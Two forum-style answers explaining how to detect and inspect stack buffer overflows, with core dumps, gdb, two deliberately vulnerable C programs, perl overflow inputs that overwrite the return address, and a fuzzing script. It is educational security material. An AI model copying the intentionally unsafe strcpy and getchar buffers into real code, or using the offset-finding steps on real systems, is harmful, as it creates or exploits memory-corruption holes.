Viewing the stack

Getting a dump of memory the simple way

You can simply send your vulnerable process a SIGSEGV (kill -SEGV pid) and, if coredump is allowed (ulimit -c unlimited), you gonna get a nice core dump file with all your memory in it.

Example:

On terminal #1:

/tmp$ ./test 
idling...
idling...
Segmentation fault <---- HERE I SEND THE 1st SIGSEGV
/tmp$ ulimit -c unlimited
/tmp$ ./test 
idling...
idling...
Segmentation fault (core dumped) <---- HERE IS THE 2d SIGSEGV
/tmp$ ls test
test    test.c  
/tmp$ ls -lah core 
-rw------- 1 1000 1000 252K Oct 10 17:42 core

On terminal #2

/tmp$ ps aux|grep test
1000  6529  0.0  0.0   4080   644 pts/1    S+   17:42   0:00 ./test
1000  6538  0.0  0.0  12732  2108 pts/2    S+   17:42   0:00 grep test
/tmp$ kill -SEGV 6529
/tmp$ ps aux|grep test
1000  6539  0.0  0.0   4080   648 pts/1    S+   17:42   0:00 ./test
1000  6542  0.0  0.0  12732  2224 pts/2    S+   17:42   0:00 grep test
/tmp$ kill -SEGV 6539

Please note that this will give you a dump of your state at the moment the binary got the SIGSEGV. So, if your binary consists of main() and evil_function() and, while receiving SIGSEV, your program was running evil_function(), you gonna get the stack of evil_function(). But you may also inspect around to get back to main() stack.

Good pointer about all that is Aleph One paper: http://insecure.org/stf/smashstack.html

Guessing the "mapping" by yourself

If we imagine that your binary is implementing a basic buffer overflow, like in this code snippet:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>


int evil_function(char *evil_input)
{
    char stack_buffer[10];
    strcpy(stack_buffer, evil_input);
    printf("input is: %s\n", stack_buffer);
    return 0;
}


int main (int ac, char **av)
{
    if (ac != 2) 
    {
        printf("Wrong parameter count.\nUsage: %s: <string>\n",av[0]);
        return EXIT_FAILURE;
    }
    evil_function(av[1]);

    return (EXIT_SUCCESS);
}

It's quite simple to guess where you should write your buffer address just by using gdb. Let's have a try with the above example program:

/tmp/bo-test$ ./test-buffer-overflow $(perl -e "print 'A'x10")
input is: AAAAAAAAAA
/tmp/bo-test$ ./test-buffer-overflow $(perl -e "print 'A'x11")
input is: AAAAAAAAAAA
/tmp/bo-test$ ./test-buffer-overflow $(perl -e "print 'A'x12")
input is: AAAAAAAAAAAA
/tmp/bo-test$ ./test-buffer-overflow $(perl -e "print 'A'x13")
input is: AAAAAAAAAAAAA
/tmp/bo-test$ ./test-buffer-overflow $(perl -e "print 'A'x14")
input is: AAAAAAAAAAAAAA
/tmp/bo-test$ ./test-buffer-overflow $(perl -e "print 'A'x15")
input is: AAAAAAAAAAAAAAA
/tmp/bo-test$ ./test-buffer-overflow $(perl -e "print 'A'x16")
input is: AAAAAAAAAAAAAAAA
Segmentation fault (core dumped)

Ok, so the stack begin being fucked up after giving 6 extra chars... Let's have a look to the stack:

/tmp/bo-test$ gdb test-buffer-overflow core
GNU gdb (Debian 7.7.1+dfsg-5) 7.7.1
[...]
Core was generated by `./test-buffer-overflow AAAAAAAAAAAAAAAA'.
Program terminated with signal SIGSEGV, Segmentation fault.
#0  0x00007f2cb2c46508 in ?? () from /lib/x86_64-linux-gnu/libc.so.6
(gdb) bt
#0  0x00007f2cb2c46508 in ?? () from /lib/x86_64-linux-gnu/libc.so.6
#1  0x0000000000000000 in ?? ()
(gdb) Quit

Let's continue with feeding it more extra char:

/tmp/bo-test$ ./test-buffer-overflow $(perl -e "print 'A'x26")
input is: AAAAAAAAAAAAAAAAAAAAAAAAAA
Segmentation fault (core dumped)
/tmp/bo-test$ gdb test-buffer-overflow core
GNU gdb (Debian 7.7.1+dfsg-5) 7.7.1
[...]
Core was generated by `./test-buffer-overflow AAAAAAAAAAAAAAAAAAAAAAAAAA'.
Program terminated with signal SIGSEGV, Segmentation fault.
#0  0x0000000000004141 in ?? ()
(gdb) 

Hey ... look at this adress: 0x0000000000004141! 0x41 is hex ascii code for ... 'A' :p We just rewrote the RET adress :) Now, last attempt, just to see:

/tmp/bo-test$ ./test-buffer-overflow AAAAAAAAAAAAAAAAAAAAAAAAABCDEFGHI
input is: AAAAAAAAAAAAAAAAAAAAAAAAABCDEFGHI
Segmentation fault (core dumped)
/tmp/bo-test$ gdb test-buffer-overflow core GNU gdb 
Core was generated by `./test-buffer-overflow AAAAAAAAAAAAAAAAAAAAAAAAABCDEFGHI'.
Program terminated with signal SIGSEGV, Segmentation fault.
#0  0x0000000000400581 in evil_function (
    evil_input=0x7fff7e2712a6 'A' <repeats 25 times>, "BCDEFGHI")
    at test-buffer-overflow.c:12
12  }
(gdb) bt
#0  0x0000000000400581 in evil_function (
    evil_input=0x7fff7e2712a6 'A' <repeats 25 times>, "BCDEFGHI")
    at test-buffer-overflow.c:12
#1  0x4847464544434241 in ?? ()
#2  0x00007fff7e260049 in ?? ()
#3  0x0000000200000000 in ?? ()
#4  0x0000000000000000 in ?? ()

This time, look at the address again: 0x4847464544434241... Now you know exactly where to write ...


@binarym's answer is pretty good. He already explains the reasons behind a buffer overflow, how you can find a simple overflow and how we can look at the stack using a corefile and/or GDB. I just want to add two extra details:

  1. A more in-depth black-box test example, i.e, this:

a description of how to consistently detect buffer overflows (black-box testing)

  1. Compiler quirks, i.e. where black-box testing fails (more-or-less, it is more like where a black-box generated payload may fail).

The code we will use is a little more complex:

#include <stdio.h>
#include <string.h>

void do_post(void)
{
    char curr = 0, message[128] = {};
    int i = 0;
    while (EOF != (curr = getchar())) {
        if ('\n' == curr) {
            message[i] = 0;
            break;
        } else {
            message[i] = curr;
        }
        i++;
    }
    printf("I got your message, it is: %s\n", message);
    return;
}

int main(void)
{
    char curr = 0, request[8] = {};
    int i = 0;
    while (EOF != (curr = getchar())) {
        request[i] = curr;
        if (!strcmp(request, "GET\n")) {
            printf("It's a GET!\n");
            return 0;
        } else if (!strcmp(request, "POST\n")) {
            printf("It's a POST, get the message\n");
            do_post();
            return 0;
        } else if (5 < strlen(request)) {
            printf("Some rubbish\n");
            return 1;
        }  /* else keep reading */
        i++;
    }
    printf("Assertion error, THIS IS A BUG please report it\n");
    return 0;
}

I'm making fun out of HTTP with POST and GET requests. And I am using getchar() to read STDIN character by character (that's a poor implementation but it is educational). The code will differentiate between GET, POST and "rubbish" (whatever else), and does that using a more-or-less properly written loop (without overflows).

Yet, when parsing the POST message there is an overflow, in the message[128] buffer. Unfortunately that buffer is deep inside the program (well, not really that deep but a simple long argument will not find it). Let's compile it and try long strings:

[~]$ gcc -O2 -o over over.c
[~]$ perl -e 'print "A"x2000' | ./over 
Some rubbish

Yeah, that does not work. Since we know the code we know that if we add "POST\n" to the beginning we will trigger the overflow. But what if we do not know the code? Or it the code is too complex? Enters black-box testing.

Black Box Testing

The most popular black box testing technique is fuzzing. Almost all other (black box) techniques are a variation of it. Fuzzing is simply feeding the program random input until we find something interesting. I wrote a simple fuzzing script to check this program, let's look at it:

#!/usr/bin/env python3

from itertools import product
from subprocess import Popen, PIPE, DEVNULL

prog = './over'
valid_returns = [ 0, 1 ]

all_chars = list(map(chr, range(256)))
# This assumes that we may find something with an input as small as 1024 bytes,
# which isn't realistic.  In the real world several megabytes of need to be
# tried.
for input_size in range(1,1024):
    input = [p for p in product(all_chars, repeat=input_size)]
    for single_input in input:
        child = Popen(prog, stdin=PIPE, stdout=DEVNULL)
        byte_input = (''.join(single_input)).encode("utf-8")
        child.communicate(input=byte_input)
        child.stdin.close()
        ret = child.wait()
        if not ret in valid_returns:
            print("INPUT", repr(byte_input), "RETURN", ret)
            exit(0)

# The exit(0) is not realistic either, in the real world I'd like to have a
# full log of the entire search space.

It simply does that: feeds increasingly big random input to the program. (WARNING: the script requires a good deal of RAM) I run this and after a few hours I get an interesting output:

INPUT b"POST\nXl_/.\xc3\x93\xc3\x90\xc2\x87\xc3\xa6dh\xc3\xaeH\xc2\xa0\xc2\x836\x16.\xc3\xb7\x1be\x1e,\xc3\x98\xc3\xa4\xc2\x81\xc2\x83 su\xc2\xb1\xc3\xb2\xc3\x8d^\xc2\xbc\xc2\xa11/\xc2\x9f\x12vY\x12[0\x0c]\xc3\xb6\x19zI\xc2\xb8\xc2\xb5\xc3\xbb\xc2\x9e\xc3\xab>^\xc2\x85\xc2\x91\xc2\xb5\xc2\xb5\xc3\xb6u\xc3\x8e).\xc3\xbcn\x1aM\xc3\xbb+{\x1c\xc3\x9a\xc3\x8b&\xc2\x93\xc2\xa1D\xc3\xad\xc3\xad\xc3\x81\xc2\xbd\xc2\x8d\xc2\xa3 \xc3\x87_\xc2\x82\xc3\x9asv\xc3\x92\xc2\x85IP\xc2\xb8\x1bS\xc3\xbe\xc3\x9e\\\xc2\x8e\xc3\x9f\xc2\xb1\xc3\xa4\xc2\xbe\x1fue\xc3\x81\xc3\x8a\xc2\x8b'\xc3\xaf\xc2\xa1\xc3\x95'\xc2\xaa\xc3\xa8P\xc2\xa7\xc2\x8f\xc3\x99\xc2\x94S5\xc2\x83\xc3\x85U" RETURN -11

The process exited -11, is it a segfault? Let's see:

kill -l | grep SIGSEGV
11) SIGSEGV 12) SIGUSR2 13) SIGPIPE 14) SIGALRM 15) SIGTERM

It is a segmentation fault alright (see this answer for clarification). Now I do have an input sample which I can use to simulate this segfault and discover (with GDB) where the overflow is.

Compiler quirks

Did you see something strange above? There is a piece of information I omitted, I used a spoiler tag below so you can go back and try to figure out. The answer is here:

Why the hell I used gcc -O2 -o over over.c? Why a plain gcc -o over over.c is not enough? What is so special about compiler optimisation (-O2) in this context?

To be fair, I myself found it astonishing that I could find this behaviour in such a simple program. Compilers rewrite a good deal of code during compilation, for performance reasons. Compilers also do try to mitigate several risks (e.g. clearly visible overflows). Often the same code may look very different with and without optimisation enabled.

Let's have a look at this specific quirk, but let's go back to perl since we do know the vulnerability already:

[~]$ gcc -O2 -o over over.c
[~]$ perl -e 'print "POST\n" . "A"x2000' | ./over 
It's a POST, get the message
I got your message, it is: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAins
Segmentation fault (core dumped)

Yes, that is exactly what we expected. But now, let's disable optimisation:

[~]$ gcc -o over over.c
[~]$ perl -e 'print "POST\n" . "A"x2000' | ./over 
It's a POST, get the message
I got your message, it is: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAÿ}
$ echo $?
0

What the hell! The compiler managed to patch the vulnerability I crafted with so much love. If you look at the length of that message you will see that it is 141 bytes long. The buffer did overflow, but the compiler added some kind of assembly to stop the writes in case the overflow gets to something important.

For the skeptics, here is the compiler version I'm using to get the behavior above:

[~]$ gcc --version
gcc (GCC) 6.2.1 20160830
Copyright (C) 2016 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.  There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.

The moral of the story is that most buffer overflow vulnerabilities only work with the same payload if compiled by the same compiler and with the same optimisation (or even other parameters). Compilers do evil things to your code to make it run faster, and although there are good chance that a payload will work on the same program compiled by two compilers, it is not always true.

Postscript

I did this answer for fun and to keep a record for myself. I do not deserve the bounty because I do not fully answer your question, I only answer the extra question added in the bounty definition. bynarym's answer deserves the bounty because he answers more parts of the original question.